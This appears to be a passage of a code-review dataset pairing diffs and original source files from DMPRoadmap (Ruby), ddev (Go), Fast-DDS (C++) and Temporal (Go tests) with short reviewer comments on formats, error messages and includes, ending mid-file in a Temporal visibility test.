@@ -246,9 +246,9 @@ class PlansController < ApplicationController file_name = @plan.title.gsub(/ /, "_") respond_to do |format| - format.html - format.csv { send_data @exported_plan.as_csv(@sections, @unanswered_question, @question_headings), filename: "#{file_name}.csv" } - format.text { send_data @exported_plan.as_txt(@sections, @unanswered_question, @question_headings, @show_details), filename: "#{file_name}.txt" } + format.html { render layout: false } + format.csv { send_data @plan.as_csv(@show_sections_questions), filename: "#{file_name}.csv" } + format.text { send_data render_to_string(partial: 'shared/export/plan_txt'), filename: "#{file_name}.txt" } format.docx { render docx: 'export', filename: "#{file_name}.docx" } format.pdf do render pdf: file_name,
1
class PlansController < ApplicationController include ConditionalUserMailer require 'pp' helper PaginableHelper helper SettingsTemplateHelper after_action :verify_authorized, except: [:overview] def index authorize Plan @plans = Plan.active(current_user).page(1) @organisationally_or_publicly_visible = Plan.organisationally_or_publicly_visible(current_user).order(:title => :asc).page(1) end # GET /plans/new # ------------------------------------------------------------------------------------ def new @plan = Plan.new authorize @plan # Get all of the available funders and non-funder orgs @funders = Org.funder.joins(:templates).where(templates: {published: true}).uniq.sort{|x,y| x.name <=> y.name } @orgs = (Org.institution + Org.managing_orgs).flatten.uniq.sort{|x,y| x.name <=> y.name } # Get the current user's org @default_org = current_user.org if @orgs.include?(current_user.org) flash[:notice] = "#{_('This is a')} <strong>#{_('test plan')}</strong>" if params[:test] @is_test = params[:test] ||= false respond_to :html end # POST /plans # ------------------------------------------------------------------- def create @plan = Plan.new authorize @plan # We set these ids to -1 on the page to trick ariatiseForm into allowing the autocomplete to be blank if # the no org/funder checkboxes are checked off org_id = (plan_params[:org_id] == '-1' ? '' : plan_params[:org_id]) funder_id = (plan_params[:funder_id] == '-1' ? '' : plan_params[:funder_id]) # If the template_id is blank then we need to look up the available templates and return JSON if plan_params[:template_id].blank? # Something went wrong there should always be a template id respond_to do |format| flash[:alert] = _('Unable to identify a suitable template for your plan.') format.html { redirect_to new_plan_path } end else # Otherwise create the plan @plan.principal_investigator = current_user.surname.blank? ? nil : "#{current_user.firstname} #{current_user.surname}" @plan.principal_investigator_email = current_user.email orcid = current_user.identifier_for(IdentifierScheme.find_by(name: 'orcid')) @plan.principal_investigator_identifier = orcid.identifier unless orcid.nil? @plan.funder_name = plan_params[:funder_name] @plan.visibility = (plan_params['visibility'].blank? ? Rails.application.config.default_plan_visibility : plan_params[:visibility]) @plan.template = Template.find(plan_params[:template_id]) if plan_params[:title].blank? @plan.title = current_user.firstname.blank? ? _('My Plan') + '(' + @plan.template.title + ')' : current_user.firstname + "'s" + _(" Plan") else @plan.title = plan_params[:title] end if @plan.save @plan.assign_creator(current_user) # pre-select org's guidance and the default org's guidance ids = (Org.managing_orgs << org_id).flatten.uniq ggs = GuidanceGroup.where(org_id: ids, optional_subset: false, published: true) if !ggs.blank? then @plan.guidance_groups << ggs end default = Template.default msg = "#{success_message(_('plan'), _('created'))}<br />" if !default.nil? && default == @plan.template # We used the generic/default template msg += " #{_('This plan is based on the default template.')}" elsif [email protected]_of.nil? # We used a customized version of the the funder template msg += " #{_('This plan is based on the')} #{plan_params[:funder_name]}: '#{@plan.template.title}' #{_('template with customisations by the')} #{plan_params[:org_name]}" else # We used the specified org's or funder's template msg += " #{_('This plan is based on the')} #{@plan.template.org.name}: '#{@plan.template.title}' template." end respond_to do |format| flash[:notice] = msg format.html { redirect_to plan_path(@plan) } end else # Something went wrong so report the issue to the user respond_to do |format| flash[:alert] = failed_create_error(@plan, 'Plan') format.html { redirect_to new_plan_path } end end end end # GET /plans/show def show @plan = Plan.eager_load(params[:id]) authorize @plan @visibility = @plan.visibility.present? ? @plan.visibility.to_s : Rails.application.config.default_plan_visibility @editing = (!params[:editing].nil? && @plan.administerable_by?(current_user.id)) # Get all Guidance Groups applicable for the plan and group them by org @all_guidance_groups = @plan.get_guidance_group_options @all_ggs_grouped_by_org = @all_guidance_groups.sort.group_by(&:org) @selected_guidance_groups = @plan.guidance_groups # Important ones come first on the page - we grab the user's org's GGs and "Organisation" org type GGs @important_ggs = [] @important_ggs << [current_user.org, @all_ggs_grouped_by_org[current_user.org]] if @all_ggs_grouped_by_org.include?(current_user.org) @all_ggs_grouped_by_org.each do |org, ggs| if org.organisation? @important_ggs << [org,ggs] end # If this is one of the already selected guidance groups its important! if !(ggs & @selected_guidance_groups).empty? @important_ggs << [org,ggs] unless @important_ggs.include?([org,ggs]) end end # Sort the rest by org name for the accordion @important_ggs = @important_ggs.sort_by{|org,gg| (org.nil? ? '' : org.name)} @all_ggs_grouped_by_org = @all_ggs_grouped_by_org.sort_by {|org,gg| (org.nil? ? '' : org.name)} @selected_guidance_groups = @selected_guidance_groups.collect{|gg| gg.id} @based_on = (@plan.template.customization_of.nil? ? @plan.template : Template.where(dmptemplate: @plan.template.customization_of).first) respond_to :html end # PUT /plans/1 # PUT /plans/1.json def update @plan = Plan.find(params[:id]) authorize @plan attrs = plan_params # Save the guidance group selections guidance_group_ids = params[:guidance_group_ids].blank? ? [] : params[:guidance_group_ids].map(&:to_i).uniq save_guidance_selections(guidance_group_ids) respond_to do |format| if @plan.update_attributes(attrs) format.html { redirect_to @plan, :editing => false, notice: success_message(_('plan'), _('saved')) } format.json {render json: {code: 1, msg: success_message(_('plan'), _('saved'))}} else flash[:alert] = failed_update_error(@plan, _('plan')) format.html { render action: "edit" } format.json {render json: {code: 0, msg: failed_update_error(@plan, _('plan'))}} end end end def share @plan = Plan.find(params[:id]) if @plan.present? authorize @plan # Get the roles where the user is not a reviewer @plan_roles = @plan.roles.select{ |r| !r.reviewer? } else redirect_to(plans_path) end end def destroy @plan = Plan.find(params[:id]) authorize @plan if @plan.destroy respond_to do |format| format.html { redirect_to plans_url, notice: success_message(_('plan'), _('deleted')) } end else respond_to do |format| flash[:alert] = failed_create_error(@plan, _('plan')) format.html { render action: "edit" } end end end # GET /status/1.json # only returns json, why is this here? def status @plan = Plan.find(params[:id]) authorize @plan respond_to do |format| format.json { render json: @plan.status } end end def answer @plan = Plan.find(params[:id]) authorize @plan if !params[:q_id].nil? respond_to do |format| format.json { render json: @plan.answer(params[:q_id], false).to_json(:include => :options) } end else respond_to do |format| format.json { render json: {} } end end end def download @plan = Plan.find(params[:id]) authorize @plan @phase_options = @plan.phases.order(:number).pluck(:title,:id) @export_settings = @plan.settings(:export) render 'download' end def export @plan = Plan.includes(:answers).joins(:answers).find(params[:id]) authorize @plan @show_coversheet = params[:export][:project_details].present? @show_sections_questions = params[:export][:question_headings].present? @show_unanswered = params[:export][:unanswered_questions].present? @hash = @plan.as_pdf(@show_coversheet) @formatting = @plan.settings(:export).formatting file_name = @plan.title.gsub(/ /, "_") respond_to do |format| format.html format.csv { send_data @exported_plan.as_csv(@sections, @unanswered_question, @question_headings), filename: "#{file_name}.csv" } format.text { send_data @exported_plan.as_txt(@sections, @unanswered_question, @question_headings, @show_details), filename: "#{file_name}.txt" } format.docx { render docx: 'export', filename: "#{file_name}.docx" } format.pdf do render pdf: file_name, margin: @formatting[:margin], footer: { center: _('Created using the %{application_name}. Last modified %{date}') % {application_name: Rails.configuration.branding[:application][:name], date: l(@plan.updated_at.to_date, formats: :short)}, font_size: 8, spacing: (@formatting[:margin][:bottom] / 2) - 4, right: '[page] of [topage]' } end end end def duplicate plan = Plan.find(params[:id]) authorize plan @plan = Plan.deep_copy(plan) respond_to do |format| if @plan.save @plan.assign_creator(current_user) format.html { redirect_to @plan, notice: success_message(_('plan'), _('copied')) } else format.html { redirect_to plans_path, alert: failed_create_error(@plan, 'Plan') } end end end # POST /plans/:id/visibility def visibility plan = Plan.find(params[:id]) if plan.present? authorize plan if plan.visibility_allowed? plan.visibility = plan_params[:visibility] if plan.save deliver_if(recipients: plan.owner_and_coowners, key: 'owners_and_coowners.visibility_changed') do |r| UserMailer.plan_visibility(r,plan).deliver_now() end render status: :ok, json: { msg: success_message(_('plan\'s visibility'), _('changed')) } else render status: :internal_server_error, json: { msg: _('Error raised while saving the visibility for plan id %{plan_id}') %{ :plan_id => params[:id]} } end else render status: :forbidden, json: { msg: _('Unable to change the plan\'s status since it is needed at least '\ '%{percentage} percentage responded') %{ :percentage => Rails.application.config.default_plan_percentage_answered } } end else render status: :not_found, json: { msg: _('Unable to find plan id %{plan_id}') %{ :plan_id => params[:id]} } end end def set_test plan = Plan.find(params[:id]) authorize plan plan.visibility = (params[:is_test] === "1" ? :is_test : :privately_visible) if plan.save render json: {code: 1, msg: (plan.is_test? ? _('Your project is now a test.') : _('Your project is no longer a test.') )} else render status: :bad_request, json: {code: 0, msg: _("Unable to change the plan's test status")} end end def request_feedback plan = Plan.find(params[:id]) authorize plan alert = _('Unable to submit your request for feedback at this time.') begin if plan.request_feedback(current_user) redirect_to share_plan_path(plan), notice: _('Your request for feedback has been submitted.') else redirect_to share_plan_path(plan), alert: alert end rescue Exception redirect_to share_plan_path(plan), alert: alert end end def overview begin plan = Plan.overview(params[:id]) authorize plan render(:overview, locals: { plan: plan }) rescue ActiveRecord::RecordNotFound flash[:alert] = _('There is no plan associated with id %{id}') %{ :id => params[:id] } redirect_to(action: :index) end end private def plan_params params.require(:plan).permit(:org_id, :org_name, :funder_id, :funder_name, :template_id, :title, :visibility, :grant_number, :description, :identifier, :principal_investigator, :principal_investigator_email, :principal_investigator_identifier, :data_contact, :data_contact_email, :data_contact_phone, :guidance_group_ids) end def save_guidance_selections(guidance_group_ids) all_guidance_groups = @plan.get_guidance_group_options plan_groups = @plan.guidance_groups guidance_groups = GuidanceGroup.where(id: guidance_group_ids) all_guidance_groups.each do |group| # case where plan group exists but not in selection if plan_groups.include?(group) && ! guidance_groups.include?(group) # remove from plan groups @plan.guidance_groups.delete(group) end # case where plan group dosent exist and in selection if !plan_groups.include?(group) && guidance_groups.include?(group) # add to plan groups @plan.guidance_groups << group end end @plan.save end # different versions of the same template have the same dmptemplate_id # but different version numbers so for each set of templates with the # same dmptemplate_id choose the highest version number. def get_most_recent( templates ) groups = Hash.new templates.each do |t| k = t.dmptemplate_id if !groups.has_key?(k) groups[k] = t else other = groups[k] if other.version < t.version groups[k] = t end end end groups.values end def fixup_hash(plan) rollup(plan, "notes", "answer_id", "answers") rollup(plan, "answers", "question_id", "questions") rollup(plan, "questions", "section_id", "sections") rollup(plan, "sections", "phase_id", "phases") plan["template"]["phases"] = plan.delete("phases") ghash = {} plan["guidance_groups"].map{|g| ghash[g["id"]] = g} plan["plans_guidance_groups"].each do |pgg| pgg["guidance_group"] = ghash[ pgg["guidance_group_id"] ] end plan["template"]["org"] = Org.find(plan["template"]["org_id"]).serializable_hash() end # find all object under src_plan_key # merge them into the items under obj_plan_key using # super_id = id # so we have answers which each have a question_id # rollup(plan, "answers", "quesiton_id", "questions") # will put the answers into the right questions. def rollup(plan, src_plan_key, super_id, obj_plan_key) id_to_obj = Hash.new() plan[src_plan_key].each do |o| id = o[super_id] if !id_to_obj.has_key?(id) id_to_obj[id] = Array.new end id_to_obj[id] << o end plan[obj_plan_key].each do |o| id = o["id"] if id_to_obj.has_key?(id) o[src_plan_key] = id_to_obj[ id ] end end plan.delete(src_plan_key) end end
1
17,406
I believe respond_to whitelists the formats passed to the block so if we don't want to display html, we can just remove the line format.html...
DMPRoadmap-roadmap
rb
@@ -21,7 +21,7 @@ var LocalDevStopCmd = &cobra.Command{ err = app.Stop() if err != nil { log.Println(err) - util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists.", app.ContainerName()) + util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists. error=", app.ContainerName(), err) } util.Success("Application has been stopped.")
1
package cmd import ( log "github.com/Sirupsen/logrus" "github.com/drud/ddev/pkg/util" "github.com/spf13/cobra" ) // LocalDevStopCmd represents the stop command var LocalDevStopCmd = &cobra.Command{ Use: "stop", Short: "Stop an application's local services.", Long: `Stop will turn off the local containers and not remove them.`, Run: func(cmd *cobra.Command, args []string) { app, err := getActiveApp() if err != nil { log.Fatalf("Could not find an active ddev configuration, have you run 'ddev config'?: %v", err) } err = app.Stop() if err != nil { log.Println(err) util.Failed("Failed to stop containers for %s. Run `ddev list` to ensure your site exists.", app.ContainerName()) } util.Success("Application has been stopped.") }, } func init() { RootCmd.AddCommand(LocalDevStopCmd) }
1
11,051
stylistic nitpick: I _feel_ like we've largely shown errors like this as "error: " vs. "error=". IMO colon/space reads better.
drud-ddev
php
@@ -18,11 +18,16 @@ */ #include <fastdds/rtps/writer/RTPSWriter.h> + +#include <fastdds/dds/log/Log.hpp> + #include <fastdds/rtps/history/WriterHistory.h> #include <fastdds/rtps/messages/RTPSMessageCreator.h> -#include <fastdds/dds/log/Log.hpp> -#include <rtps/participant/RTPSParticipantImpl.h> + +#include <rtps/history/BasicPayloadPool.hpp> +#include <rtps/history/CacheChangePool.h> #include <rtps/flowcontrol/FlowController.h> +#include <rtps/participant/RTPSParticipantImpl.h> #include <mutex>
1
// Copyright 2016 Proyectos y Sistemas de Mantenimiento SL (eProsima). // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. /* * @file RTPSWriter.cpp * */ #include <fastdds/rtps/writer/RTPSWriter.h> #include <fastdds/rtps/history/WriterHistory.h> #include <fastdds/rtps/messages/RTPSMessageCreator.h> #include <fastdds/dds/log/Log.hpp> #include <rtps/participant/RTPSParticipantImpl.h> #include <rtps/flowcontrol/FlowController.h> #include <mutex> namespace eprosima { namespace fastrtps { namespace rtps { RTPSWriter::RTPSWriter( RTPSParticipantImpl* impl, const GUID_t& guid, const WriterAttributes& att, WriterHistory* hist, WriterListener* listen) : Endpoint(impl, guid, att.endpoint) , m_pushMode(true) , mp_history(hist) , mp_listener(listen) , is_async_(att.mode == SYNCHRONOUS_WRITER ? false : true) , m_separateSendingEnabled(false) , locator_selector_(att.matched_readers_allocation) , all_remote_readers_(att.matched_readers_allocation) , all_remote_participants_(att.matched_readers_allocation) , liveliness_kind_(att.liveliness_kind) , liveliness_lease_duration_(att.liveliness_lease_duration) , liveliness_announcement_period_(att.liveliness_announcement_period) , next_{nullptr} { mp_history->mp_writer = this; mp_history->mp_mutex = &mp_mutex; logInfo(RTPS_WRITER, "RTPSWriter created"); } RTPSWriter::~RTPSWriter() { logInfo(RTPS_WRITER, "RTPSWriter destructor"); // Deletion of the events has to be made in child destructor. mp_history->mp_writer = nullptr; mp_history->mp_mutex = nullptr; } CacheChange_t* RTPSWriter::new_change( const std::function<uint32_t()>& dataCdrSerializedSize, ChangeKind_t changeKind, InstanceHandle_t handle) { logInfo(RTPS_WRITER, "Creating new change"); CacheChange_t* ch = nullptr; if (!mp_history->reserve_Cache(&ch, dataCdrSerializedSize)) { logWarning(RTPS_WRITER, "Problem reserving Cache from the History"); return nullptr; } ch->kind = changeKind; if (m_att.topicKind == WITH_KEY && !handle.isDefined()) { logWarning(RTPS_WRITER, "Changes in KEYED Writers need a valid instanceHandle"); } ch->instanceHandle = handle; ch->writerGUID = m_guid; return ch; } SequenceNumber_t RTPSWriter::get_seq_num_min() { CacheChange_t* change; if (mp_history->get_min_change(&change) && change != nullptr) { return change->sequenceNumber; } else { return c_SequenceNumber_Unknown; } } SequenceNumber_t RTPSWriter::get_seq_num_max() { CacheChange_t* change; if (mp_history->get_max_change(&change) && change != nullptr) { return change->sequenceNumber; } else { return c_SequenceNumber_Unknown; } } uint32_t RTPSWriter::getTypeMaxSerialized() { return mp_history->getTypeMaxSerialized(); } bool RTPSWriter::remove_older_changes( unsigned int max) { logInfo(RTPS_WRITER, "Starting process clean_history for writer " << getGuid()); std::lock_guard<RecursiveTimedMutex> guard(mp_mutex); bool limit = (max != 0); bool remove_ret = mp_history->remove_min_change(); bool at_least_one = remove_ret; unsigned int count = 1; while (remove_ret && (!limit || count < max)) { remove_ret = mp_history->remove_min_change(); ++count; } return at_least_one; } CONSTEXPR uint32_t info_dst_message_length = 16; CONSTEXPR uint32_t info_ts_message_length = 12; CONSTEXPR uint32_t data_frag_submessage_header_length = 36; uint32_t RTPSWriter::getMaxDataSize() { return calculateMaxDataSize(mp_RTPSParticipant->getMaxMessageSize()); } uint32_t RTPSWriter::calculateMaxDataSize( uint32_t length) { uint32_t maxDataSize = mp_RTPSParticipant->calculateMaxDataSize(length); maxDataSize -= info_dst_message_length + info_ts_message_length + data_frag_submessage_header_length; //TODO(Ricardo) inlineqos in future. #if HAVE_SECURITY if (getAttributes().security_attributes().is_submessage_protected) { maxDataSize -= mp_RTPSParticipant->security_manager().calculate_extra_size_for_rtps_submessage(m_guid); } if (getAttributes().security_attributes().is_payload_protected) { maxDataSize -= mp_RTPSParticipant->security_manager().calculate_extra_size_for_encoded_payload(m_guid); } #endif // if HAVE_SECURITY return maxDataSize; } void RTPSWriter::add_guid( const GUID_t& remote_guid) { const GuidPrefix_t& prefix = remote_guid.guidPrefix; all_remote_readers_.push_back(remote_guid); if (std::find(all_remote_participants_.begin(), all_remote_participants_.end(), prefix) == all_remote_participants_.end()) { all_remote_participants_.push_back(prefix); } } void RTPSWriter::compute_selected_guids() { all_remote_readers_.clear(); all_remote_participants_.clear(); for (LocatorSelectorEntry* entry : locator_selector_.transport_starts()) { if (entry->enabled) { add_guid(entry->remote_guid); } } } void RTPSWriter::update_cached_info_nts() { locator_selector_.reset(true); mp_RTPSParticipant->network_factory().select_locators(locator_selector_); } bool RTPSWriter::destinations_have_changed() const { return false; } GuidPrefix_t RTPSWriter::destination_guid_prefix() const { return all_remote_participants_.size() == 1 ? all_remote_participants_.at(0) : c_GuidPrefix_Unknown; } const std::vector<GuidPrefix_t>& RTPSWriter::remote_participants() const { return all_remote_participants_; } const std::vector<GUID_t>& RTPSWriter::remote_guids() const { return all_remote_readers_; } bool RTPSWriter::send( CDRMessage_t* message, std::chrono::steady_clock::time_point& max_blocking_time_point) const { RTPSParticipantImpl* participant = getRTPSParticipant(); return locator_selector_.selected_size() == 0 || participant->sendSync(message, locator_selector_.begin(), locator_selector_.end(), max_blocking_time_point); } const LivelinessQosPolicyKind& RTPSWriter::get_liveliness_kind() const { return liveliness_kind_; } const Duration_t& RTPSWriter::get_liveliness_lease_duration() const { return liveliness_lease_duration_; } const Duration_t& RTPSWriter::get_liveliness_announcement_period() const { return liveliness_announcement_period_; } } // namespace rtps } // namespace fastrtps } // namespace eprosima
1
19,802
We could put this implementation in `RTPSWriter::create_change_pool` and avoid an extra function.
eProsima-Fast-DDS
cpp
@@ -25,6 +25,7 @@ package persistencetests import ( + "fmt" "time" "github.com/pborman/uuid"
1
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package persistencetests import ( "time" "github.com/pborman/uuid" "github.com/stretchr/testify/require" commonpb "go.temporal.io/api/common/v1" enumspb "go.temporal.io/api/enums/v1" workflowpb "go.temporal.io/api/workflow/v1" "go.temporal.io/server/common/dynamicconfig" "go.temporal.io/server/common/log/tag" "go.temporal.io/server/common/metrics" "go.temporal.io/server/common/namespace" "go.temporal.io/server/common/payload" "go.temporal.io/server/common/persistence" "go.temporal.io/server/common/persistence/cassandra" persistencetests "go.temporal.io/server/common/persistence/persistence-tests" "go.temporal.io/server/common/persistence/visibility" "go.temporal.io/server/common/persistence/visibility/manager" "go.temporal.io/server/common/primitives/timestamp" "go.temporal.io/server/common/resolver" "go.temporal.io/server/common/searchattribute" ) type ( // VisibilityPersistenceSuite tests visibility persistence VisibilityPersistenceSuite struct { // override suite.Suite.Assertions with require.Assertions; this means that s.NotNil(nil) will stop the test, // not merely log an error *require.Assertions persistencetests.TestBase VisibilityMgr manager.VisibilityManager } ) // SetupSuite implementation func (s *VisibilityPersistenceSuite) SetupSuite() { s.DefaultTestCluster.SetupTestDatabase() cfg := s.DefaultTestCluster.Config() var err error s.VisibilityMgr, err = visibility.NewStandardManager( cfg, resolver.NewNoopResolver(), dynamicconfig.GetIntPropertyFn(1000), dynamicconfig.GetIntPropertyFn(1000), metrics.NewNoopMetricsClient(), s.Logger) if err != nil { // s.NoError doesn't work here. s.Logger.Fatal("Unable to create visibility manager", tag.Error(err)) } } // SetupTest implementation func (s *VisibilityPersistenceSuite) SetupTest() { // Have to define our overridden assertions in the test setup. If we did it earlier, s.T() will return nil s.Assertions = require.New(s.T()) } // TearDownSuite implementation func (s *VisibilityPersistenceSuite) TearDownSuite() { s.VisibilityMgr.Close() s.DefaultTestCluster.TearDownTestDatabase() } // TestBasicVisibility test func (s *VisibilityPersistenceSuite) TestBasicVisibility() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startTime := time.Now().UTC().Add(time.Second * -5) startReq := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq) s.Nil(err0) resp, err1 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.Nil(err1) s.Equal(1, len(resp.Executions)) s.assertOpenExecutionEquals(startReq, resp.Executions[0]) closeReq := &manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: time.Now(), HistoryLength: 5, } err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(closeReq) s.Nil(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.Nil(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: time.Now(), }) s.Nil(err4) s.Equal(1, len(resp.Executions)) s.assertClosedExecutionEquals(closeReq, resp.Executions[0]) } // TestBasicVisibilityTimeSkew test func (s *VisibilityPersistenceSuite) TestBasicVisibilityTimeSkew() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-time-skew", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startTime := time.Now().UTC() err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) resp, err1 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err1) s.Equal(1, len(resp.Executions)) s.Equal(workflowExecution.WorkflowId, resp.Executions[0].Execution.WorkflowId) err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(-10 * time.Millisecond), }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(-10 * time.Millisecond), // This is actually close_time LatestStartTime: startTime.Add(-10 * time.Millisecond), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) } func (s *VisibilityPersistenceSuite) TestBasicVisibilityShortWorkflow() { testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-short-workflow", RunId: "3c095198-0c33-4136-939a-c29fbbb6a80b", } startTime := time.Now().UTC() err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(10 * time.Millisecond), }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(10 * time.Millisecond), // This is actually close_time LatestStartTime: startTime.Add(10 * time.Millisecond), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) } func (s *VisibilityPersistenceSuite) TestVisibilityRetention() { if _, ok := s.DefaultTestCluster.(*cassandra.TestCluster); !ok { return } testNamespaceUUID := namespace.ID(uuid.New()) workflowExecution := commonpb.WorkflowExecution{ WorkflowId: "visibility-workflow-test-visibility-retention", RunId: "3c095198-0c33-4136-939a-c29fbbb6a802", } startTime := time.Now().UTC().Add(-1 * time.Hour) err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(&manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, }) s.NoError(err0) retention := 1 * time.Second err2 := s.VisibilityMgr.RecordWorkflowExecutionClosed(&manager.RecordWorkflowExecutionClosedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution, WorkflowTypeName: "visibility-workflow", StartTime: startTime, }, CloseTime: startTime.Add(1 * time.Minute), Retention: &retention, }) s.NoError(err2) resp, err3 := s.VisibilityMgr.ListOpenWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime, LatestStartTime: startTime, }) s.NoError(err3) s.Equal(0, len(resp.Executions)) resp, err4 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(1 * time.Minute), // This is actually close_time LatestStartTime: startTime.Add(1 * time.Minute), }) s.NoError(err4) s.Equal(1, len(resp.Executions)) // Sleep for retention to fire. time.Sleep(retention) resp2, err5 := s.VisibilityMgr.ListClosedWorkflowExecutions(&manager.ListWorkflowExecutionsRequest{ NamespaceID: testNamespaceUUID, PageSize: 1, EarliestStartTime: startTime.Add(1 * time.Minute), // This is actually close_time LatestStartTime: startTime.Add(1 * time.Minute), }) s.NoError(err5) s.Equal(0, len(resp2.Executions)) } // TestVisibilityPagination test func (s *VisibilityPersistenceSuite) TestVisibilityPagination() { testNamespaceUUID := namespace.ID(uuid.New()) // Create 2 executions startTime1 := time.Now().UTC() workflowExecution1 := commonpb.WorkflowExecution{ WorkflowId: "visibility-pagination-test1", RunId: "fb15e4b5-356f-466d-8c6d-a29223e5c536", } startReq1 := &manager.RecordWorkflowExecutionStartedRequest{ VisibilityRequestBase: &manager.VisibilityRequestBase{ NamespaceID: testNamespaceUUID, Execution: workflowExecution1, WorkflowTypeName: "visibility-workflow", StartTime: startTime1, }, } err0 := s.VisibilityMgr.RecordWorkflowExecutionStarted(startReq1) s.Nil(err0) startTime2 := startTime1.Add(time.Second) workflowExecution2 := 